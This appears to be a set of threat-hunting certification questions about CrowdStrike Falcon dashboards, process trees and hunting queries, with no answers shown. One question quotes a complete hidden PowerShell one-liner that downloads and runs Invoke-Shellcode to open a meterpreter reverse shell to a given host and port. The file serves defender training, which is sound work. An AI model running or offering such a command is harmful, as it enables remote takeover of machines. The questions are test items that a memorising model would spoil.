You receive an alert for the following process tree:
w3wp.exe > powershell.exe > cmd.exe > whoami.exe > net1.exe Which of the following describes what has occurred?
You see a large number of command-line processes calling back to an unusual domain that you are reviewing with the Bulk Domain Investigate dashboard. What should your next steps be?
You are investigating an alert for a process that connected to the following suspicious domain: reallysuspiciousdomain[.]com. Which of the Investigate dashboards would provide a list of processes that looked up the specified domain?
Which built-in hunting report helps you find executables from the Recycle Bin?
Which hunting query's results could indicate that an adversary is performing reconnaissance from a specific host?
You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:
powershell.exe Windowstyle Hidden noprofile noexit -c IEX ((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force
What is this command doing?
An attacker created a scheduled task which executes a remote management application. Which MITRE ATT & CK Matrix for Enterprise stage is this an example of?
You get a detection for a malicious PowerShell script with the process flow below:
Unknown Process - > chrome.exe - > wscript.exe - > powershell.exe Which process should you investigate further to identify the source of the script?
Which statement will filter for all events that correspond to a new scheduled task registered by the user "Doris"?
Which pre-defined reports will show activities that typically indicate suspicious activity occurring on a system?
You've experienced a ransomware infection that has spread throughout the enterprise. What is the first step you would take to determine the source of infection?
Falcon is generating detections for a malicious file evil.exe with varying filepaths on several hosts as end users attempt to execute the file. Which query can be used to proactively hunt where the file exists prior to the user executing it?